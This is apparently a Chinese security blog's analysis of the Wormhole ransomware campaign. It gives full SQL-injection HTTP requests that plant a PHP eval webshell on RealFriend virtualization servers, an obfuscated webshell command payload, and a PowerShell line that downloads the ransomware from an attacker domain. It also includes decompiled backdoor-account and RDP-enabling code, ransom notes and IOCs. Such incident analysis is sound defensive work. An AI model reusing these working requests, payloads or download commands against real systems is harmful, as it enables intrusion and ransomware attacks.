随便分析下
Analysis
拿到样本之后丢IDA
代码挺直白的,文件后缀白名单,服务名,进程名,卷影拷贝删除命令,加密公钥都明文写Main函数里面
还有个bat文件
start /min deleteFile.bat
大概看了一下,应该是用来删除以下几个文件
Wormhole.exe
WormholeB.exe
ruiyouabcd1234.php
phpinfo.php
logo-eoffice.php
前两个大概率是勒索程序了
第三个猜测是Webshell
最后一个是泛微E-Office文件上传漏洞利用成功之后的Webshell文件名
应该是怕其他人利用这个漏洞拿权限,但是感觉没什么卵用
Web根目录上都写了十几个马了
沙箱行为只有加密文件,没有网络通信行为
通过某种方法抓到了Webshell的内容
abcd1234<?php eval($_POST["LYYKtWSAQq6HsF3N"]);?>
攻击流程
整点非常规应急响应,根据日志以及魔改Webshell还原出如下攻击流程
漏洞为瑞友天翼应用虚拟化系统的SQL注入漏洞,加上管理员权限运行就可以写入Webshell了
受影响的版本为 5.x <= Version <= 7.0.2.1
资产探测以及版本信息确认
1 2 3 4 5 GET /RapAgent.xgi?CMD=GetRegInfo HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
写入phpinfo以确认漏洞是否存在
1 2 3 4 5 GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Cphpinfo.php%22+--+-&cmd=UserLogin HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
写入Webshell
1 2 3 4 5 GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27abcd1234%3C%3Fphp+eval%28%24_POST%5B%22LYYKtWSAQq6HsF3N%22%5D%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Cruiyouabcd1234.php%22+--+-&cmd=UserLogin HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive
执行命令
1 2 3 4 5 6 7 8 9 10 POST /ruiyouabcd1234.php HTTP/1.1 Host: [DATA EXPUNGED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 5255 LYYKtWSAQq6HsF3N=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.41c435%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%220a701%22.%221644b%22%3Becho%20%40asenc(%24output)%3Becho%20%229303%22.%2202044%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22c2cf9b4c7b1194%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22q489dad02f83c5%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22ffc93031853f3%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%
2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2
048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&c2cf9b4c7b1194=H4Y21k&ffc93031853f3=se&q489dad02f83c5=3AY2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMgKHg4NikvUmVhbEZyaWVuZC9SYXAgU2VydmVyL1dlYlJvb3QiJnBvd2Vyc2hlbGwgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIihOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly93d3cucmc3N2U2NDJtdGNobTU4aC5jb20vV29ybWhvbGVCLmV4ZScsICdDOlxQcm9ncmFtIEZpbGVzICh4ODYpXFJlYWxGcmllbmRcUmFwIFNlcnZlclxXZWJSb290XFdvcm1ob2xlQi5leGUnKTsgaWYgKCQ%2FKSB7IFdyaXRlLUhvc3QgJ1N1Y2Nlc3MnIH0iJmVjaG8gYzk5MzAzMmE1JmNkJmVjaG8gYzEwMGUxZWFl
执行命令如下
cd /d "C:/Program Files (x86)/RealFriend/Rap Server/WebRoot"&powershell -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://www.rg77e642mtchm58h.com/WormholeB.exe', 'C:\Program Files (x86)\RealFriend\Rap Server\WebRoot\WormholeB.exe'); if ($?) { Write-Host 'Success' }"&echo c993032a5&cd&echo c100e1eae
失陷站点上存在Wormhole.exe,估计是早批次的命令执行的结果
虽然下载了勒索程序,但是并没有直接执行,大概是在做进一步的内网渗透?
Ransom
Public Key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqnJhs7S6xt+A0E/xUcaO
DcK/R8LZoLKhsQYG9b/uibVk/4cfEFtGwdTnM3AZbDWKqEJL+L/xt7J2AQzG3beS
7vmRv0NyDDvrArf7QPl5i/A9Gyl5Tr82G+shZwLDlLETCI8KgNSFvW6VgUDnKnCR
xjqdYxa4Y80ud2q5FmlJA+KMmBYyQVVAaxgbR72LqTASf1E4FohGOa3/DLAQbQqI
7wOsudYKMKPmImZ7AxXe86mxRI3fjmUWRAddbkl/GILWu5KidArG0a9EENVADh2g
B0g3iGSzz9B/erqAKG7Sd7s6i0TlVnUmj+FSs9lObKCCghrOBgLoWjMiYH2SSt4i
XQIDAQAB
-----END PUBLIC KEY-----
Ransom Note
1 2 3 4 5 6 7 8 9 10 11 12 13 14 Please contact us via Tox.chat tool or qtox tool Download Tox.chat https://tox.chat/download.html Download qtox https://github.com/qTox/qTox/blob/master/README.md#qtox If your chat Tool cannot connect to the Internet, please set up a proxy. Add our TOX ID and send an encrypted file and Wormhole ID for testing decryption. Our TOX ID 503313BA88174FDF187C5009A43B45CBC144D313EFBF98BB75BFA084B5743E3ECA94499F95ED Your Wormhole ID: aWtfpQoMkfi5reJ7kRi77kHpH0u+eu1vSD9VL86J0XC1s+FfWkWNG8MIk4ypSNj7 v6PsXpbmq3OhPf84ctfZiQhqnwGHWjKpCKdvx1r9uQ7C5xty9tmQ1vl/KeW0RfaI F/4BGazwcg0ZJQTxMfqVRo+5lfFIeb1fCs0aZbpSE3mPMS6YBDLhRcTiKuvDPZ/2 My5YSkFK72/YTZhjJ4I40TN/k7ZBg1KS7WYjfMJlUJ16tI79VkyDD+BUU9dYAacE Nhb+OxQn7TB1LCOE/gDEXdbpEi/9evi0vCt/ycPDP73wVknQGapkfZSPtI0Gup3e sYSpovrzOQyKng8wHIZTog==
勒索金额为0.023BTC,至少当时是
IOC
80.78.24.254
www.rg77e642mtchm58h.com
dff3fd0197c5ea432f58f62a5f40dfa8e0cdc3ecca36bcf3221962349fbd9a22
8b301ea74563e786042a59b4ac95bb4ef738fb8c7d71d1e5f3c6ce90dbfa1980
53b576cb4af70f4610df30fbfd872f526d280fa65780dc23cd304463d34cd13f
漏洞利用的IP,文件服务器域名,以及三个勒索程序
非常规应急响应
准备
GetShell
信息收集
他人遗留文件
access.log,获得更多攻击行为
Powershell记录
修改他人Webshell,记录POST参数以获取更多攻击行为
Cleaning
删除自身遗留文件
access.log覆写
handle解除文件占用(管理员权限)
Update 2024.05.11
勒索程序更新了,多了个要删除的文件test1.exe
正好失陷机器上能下载到test1.exe
总共就两个函数,一个加后门管理员账户,一个开远程桌面访问
后门账户是"test1:n5eEUa&p3whUmCMf"
// Decompiled (IDA) from test1.exe: creates a local backdoor account and adds it to the
// local Administrators group. The credentials are hard-coded in the binary (see the two
// MultiByteToWideChar calls). sub_401010 is not shown on this page; from its string
// arguments it looks like a message-printing helper — unverified. The v1[0] byte passed
// to it is never initialised in this listing (decompiler artifact, or the helper ignores it).
//
// Defender notes: this sequence shows up as a local account creation followed by a
// membership change on the Administrators group (Security log events 4720 / 4732);
// NetUserAdd + NetLocalGroupAddMembers imports in an otherwise tiny executable are a
// strong static indicator. Pointers are stored through _DWORD casts, i.e. a 32-bit build.
int sub_401170()
{
  BYTE v1[4]; // [esp+0h] [ebp-430h] BYREF
  BYTE buf[4]; // [esp+4h] [ebp-42Ch] BYREF
  WCHAR *v3; // [esp+8h] [ebp-428h]
  int v4; // [esp+10h] [ebp-420h]
  int v5; // [esp+14h] [ebp-41Ch]
  int v6; // [esp+18h] [ebp-418h]
  int v7; // [esp+1Ch] [ebp-414h]
  int v8; // [esp+20h] [ebp-410h]
  DWORD parm_err; // [esp+24h] [ebp-40Ch] BYREF
  WCHAR WideCharStr[256]; // [esp+28h] [ebp-408h] BYREF
  WCHAR v11[258]; // [esp+228h] [ebp-208h] BYREF

  // Account name and password, converted to UTF-16 for the Net* APIs.
  MultiByteToWideChar(0, 0, "test1", -1, WideCharStr, 256);
  MultiByteToWideChar(0, 0, "n5eEUa&p3whUmCMf", -1, v11, 256);
  parm_err = 0;
  // buf, v3 .. v8 are consecutive stack slots (esp+4 .. esp+20): the decompiler has split
  // the USER_INFO_1 structure that NetUserAdd level 1 expects into separate locals —
  // name, password, [password_age at esp+Ch, never written], priv, home_dir, comment,
  // flags, script_path. v4 = 1 and v7 = 1 presumably correspond to USER_PRIV_USER and
  // UF_SCRIPT — confirm against the USER_INFO_1 layout.
  *(_DWORD *)buf = WideCharStr;
  v3 = v11;
  v4 = 1;
  v5 = 0;
  v6 = 0;
  v7 = 1;
  v8 = 0;
  // Server name 0 = local machine; a non-zero return is a NET_API_STATUS error.
  if ( NetUserAdd(0, 1u, buf, &parm_err) )
    return sub_401010("Add user failed.\n", v1[0]);
  sub_401010("Add user success.\n", v1[0]);
  // Level 3 member entry (LOCALGROUP_MEMBERS_INFO_3): a single pointer to the account
  // name; v1 is reused as that one-element entry, count 1.
  *(_DWORD *)v1 = WideCharStr;
  if ( NetLocalGroupAddMembers(0, L"Administrators", 3u, v1, 1u) )
    return sub_401010("Failed to add user to Administrators group.\n", v1[0]);
  else
    return sub_401010("User added to Administrators group successfully.\n", v1[0]);
}
// Decompiled (IDA) from test1.exe: enables inbound Remote Desktop by clearing
// HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections.
// Returns 1 when the value is already 0 or was successfully rewritten as 0, and 0 on
// any registry error (open, query or set). The sub_401290 / std::ostream::operator<<
// pairs look like cout-style logging; v0, v3, v5 and v6 are uninitialised in the
// decompiler output (probably a stream object / argument IDA failed to track) — unverified.
//
// Defender notes: a write of fDenyTSConnections = 0 by an unexpected process is a
// high-signal registry change; combined with the account created in sub_401170 it
// gives the operator an RDP login path, so also watch for new inbound RDP sessions
// from that account.
char sub_401050()
{
  int v0; // ecx
  int v1; // eax
  int v3; // ecx
  int v4; // eax
  int v5; // [esp+0h] [ebp-14h]
  int v6; // [esp+0h] [ebp-14h]
  HKEY phkResult; // [esp+4h] [ebp-10h] BYREF
  BYTE Data[4]; // [esp+8h] [ebp-Ch] BYREF
  DWORD cbData; // [esp+Ch] [ebp-8h] BYREF

  cbData = 4;
  // 0x2001F == KEY_READ | KEY_WRITE. No handle is open on this failure path, so the
  // jump to LABEL_2 correctly skips RegCloseKey.
  if ( RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", 0, 0x2001Fu, &phkResult) )
    goto LABEL_2;
  // Failure when the query fails, or when the value is non-zero (RDP denied) and
  // rewriting it as REG_DWORD (type 4, 4 bytes) 0 fails. A value that is already 0
  // short-circuits past the write and falls through to the success path.
  if ( RegQueryValueExA(phkResult, "fDenyTSConnections", 0, 0, Data, &cbData)
    || *(_DWORD *)Data && (*(_DWORD *)Data = 0, RegSetValueExA(phkResult, "fDenyTSConnections", 0, 4u, Data, 4u)) )
  {
    RegCloseKey(phkResult);
LABEL_2:
    v1 = sub_401290(v0, sub_4014D0);
    std::ostream::operator<<(v1, v5);
    return 0;
  }
  v4 = sub_401290(v3, sub_4014D0);
  std::ostream::operator<<(v4, v6);
  RegCloseKey(phkResult);
  return 1;
}
文件服务器上也多了fscan跟mimikatz,估计是要做内网渗透了,跟我之前预估的差不多
IOC
62b241d46f17d0bf2c3026c87febf8b0f5cd8c04a87404da0e86abb27e30ab95 WormholeB.exe
873c085e01df8912eb5d9d021950bc451cbc3568b43830a4d31a58bfc804996f test1.exe
78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029 fscan.exe (UPX)
d86e5d2701b548dfbe0419bcffb2ae82c6ccdeb6dc9612050273c543a6f5215a master.zip (mimikatz)
Update 2024.05.13
文件服务器上面多了个32位的fscan.exe
失陷主机上多了个regeorg,感觉大概率是Wormhole放的
程序也更新了,这次放的是Wormhole.exe
编译时间是2024.05.12 14:15:01 (UTC+8)
服务器上的文件时间是2024.05.12 14:36:56 (UTC+8)
删除的文件变成了Wormhole.exe和test1.exe
而且多了个删除后门用户的函数和删除Windows事件日志的函数sub_44E050()
// Decompiled (IDA) from the 2024-05-12 build of Wormhole.exe: removes the "test1"
// backdoor account that test1.exe (sub_401170 above) created, i.e. the ransomware
// cleans up its own foothold. Returns the NetUserDel status (0 == success).
//
// Defender note: the deletion is logged as Security event 4726; the account being
// absent at response time does not mean it was never created — check 4720/4732 as well.
DWORD sub_44EC80()
{
  WCHAR WideCharStr[256]; // [esp+0h] [ebp-204h] BYREF

  MultiByteToWideChar(0, 0, "test1", -1, WideCharStr, 256);
  // Server name 0 = local machine.
  return NetUserDel(0, WideCharStr);
}
删日志的函数太长了,懒得放了
Ransom Note
1 2 3 4 5 6 7 8 9 10 11 12 13 14 Please contact us through the qtox tool within 3 days and Pay 0.023btc otherwise we will delete the password and sell the data Download qtox https://github.com/qTox/qTox/blob/master/README.md#qtox if you can't contact us, please contact some data recovery company(suggest taobao.com), may they can contact to us. Add our TOX ID and send an encrypted file and Wormhole ID for testing decryption. Our TOX ID 503313BA88174FDF187C5009A43B45CBC144D313EFBF98BB75BFA084B5743E3ECA94499F95ED Your Wormhole ID: eRImtlWObmRSVHL6wKAFySqWjpGtrGrBOKya1kMIkQiWwzyZmm71Rv7NcoIlW4IM 41oNmkIa3uH9yg96hNyyImkTvFhUwngy4Ng4gFTEuVoZfqeuEym7I1ZmPibLT6Mz rw25eKae5fr3CqGPJEu0Cj7M+5gQOXQO/QE1NWIVmYWzcFxBxHD5Zojlo1IVZZ0V 9887Ms/oOK3lHpsR1XF2e/NmcSy4x5o9bNTjI8JGhO2Y0XfpQRayqdRGXC4R2wLk 2V+YwaQwDIvK04iT1qsE6Gy2PSY+jZEkwvutyxYwX6K+4rglo8o/pBl2mLxovsrb XCb8TrA5eEIaYvtUd0zyqQ==
有点Chinglish,语法错误错得跟Tellyouthepass一个味
IOC
0582e46a142fa10e45ec2d1e207570d80252897e61e82e4f7475b9c971776e96 Wormhole.exe
612d940023d8530377f0571cb839d667e172dcbe307878ffd31b20f534c1169d fscan32.exe
EOF